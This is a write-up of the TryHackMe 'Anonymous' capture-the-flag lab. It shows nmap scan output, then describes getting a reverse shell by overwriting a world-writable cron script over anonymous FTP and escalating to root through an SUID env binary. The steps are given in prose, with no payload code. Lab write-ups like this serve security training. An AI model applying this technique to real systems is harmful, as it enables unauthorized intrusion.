Anonymous
https://tryhackme.com/room/anonymous
Task 1: Pwn
Enumerate the machine. How many ports are open?
Let's perform a simple nmap scan against the target machine.
$ nmap -p- 10.10.94.176 -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-02 20:19 IST
Warning: 10.10.94.176 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.94.176
Host is up (0.13s latency).
Not shown: 65503 closed tcp ports (conn-refused), 28 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 530.35 secondsWe can now perform an in-depth scan only on the open ports.
$ nmap -A -p 21,22,139,445 10.10.94.176
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-02 20:30 IST
Nmap scan report for 10.10.94.176
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.48.138
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-02-02T15:00:15
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2024-02-02T15:00:15+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.88 secondsThere are four open ports:
21
ftp
22
ssh
139
netbios-ssn (smbd)
445
netbios-ssn (smbd)
Answer
What service is running on port 21?
Answer
What service is running on ports 139 and 445?
Answer
There's a share on the user's computer. What's it called?
We can list out the SMB shares on the target using smbclient.
Answer
user.txt
Looking back at our nmap scan, we can see that anonymous login is allowed on the FTP server.
Let's perform some enumeration on the server.
We can use the get command to download the files from the FTP server to our attacker machine.
Let's catout the removed_files.log file.
Let's check the clean.sh script next.
So it seems like this script is a cronjob that runs after a particular time interval and adds the output into the ``removed_files.log` file.
In that case we can replace the content of the file to a reverse shell in order to obtain a shell on the target machine. We can get the script from Pentest Monkey.
Once the clean.sh file has been modified, we can log back into the FTP server and upload the file using the put command.
Now all we have to do is set up a nc listener and wait.
After a while we would have connected to the target machine using our reverse shell.
Let's get the user.txt flag.
Answer
root.txt
Let's search for files with the SUID bit set.
For this particular lab we will be using the /usr/bin/env to escalate our privileges. The exploit can be found on GTFOBins.
Let's use the exploit.
We can now read the root flag.
Answer
Last updated
Was this helpful?